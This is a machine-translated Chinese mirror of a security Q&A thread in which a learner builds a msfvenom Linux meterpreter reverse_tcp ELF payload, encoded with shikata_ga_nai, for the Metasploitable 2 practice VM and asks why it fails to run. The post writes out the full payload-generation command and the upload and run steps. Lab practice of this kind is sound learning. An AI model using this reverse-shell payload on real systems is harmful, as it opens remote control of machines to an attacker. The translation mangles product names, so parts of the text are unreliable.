首页
学习
活动
专区
圈层
工具
发布
社区首页 >问答首页 >如何使用msfvenom精灵方法处理元可倍2?

如何使用msfvenom精灵方法处理元可倍2?
EN

Security用户
提问于 2021-02-12 17:19:26
回答 1查看 1.5K关注 0票数 1

如何使用msfvenom精灵方法处理元可倍2?

我正在读一本书,教我如何为Windows制作一个msfvenom可执行文件。但我正在学习元可绘制2。我真的不想跳过这一节而不理解这一点。所以我得到了另外两本书,但他们都只教Windows的方法,搜索网络,似乎我只找到了Windows的方式。所以我自己就开始做了。我做了下面的事。

代码语言:javascript
复制
msfvenom -a x86 --platform linux -p linux/x86/meterpreter/reverse_tcp LHOST=xxx.xxx.xxx.xxx LPORT=xxxx -e x86/shikata_ga_nai -f elf -o test.elf

然后我得到了一个壳

代码语言:javascript
复制
Upload test.elf test.elf 

然后我在机器上运行了bash test.elf,它什么也没做

我运行了file test.elf我得到了:

代码语言:javascript
复制
ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, corrupted section header size

我做错了什么?

EN

回答 1

Security用户

发布于 2021-02-19 18:58:49

经过几次重试,稍微调整有效载荷。都没有用。我重新安装了Metasploitable 2。

我再次按原计划重新制作了有效载荷。

我在元可绘制机器上运行了sudo ./test.elf,它成功了。

我以前运行过sudo ./test.elf,它给了我在另一个安装中找不到的命令。

现在看来起作用了。在制造了几个有效载荷之后,它们现在都能工作了。我想这是一个糟糕的安装,或者我搞砸了另一个Metasploitable 2。

票数 0
EN
页面原文内容由Security提供。腾讯云小微IT领域专用引擎提供翻译支持
原文链接:

https://security.stackexchange.com/questions/244731

复制
相关文章

相似问题

领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档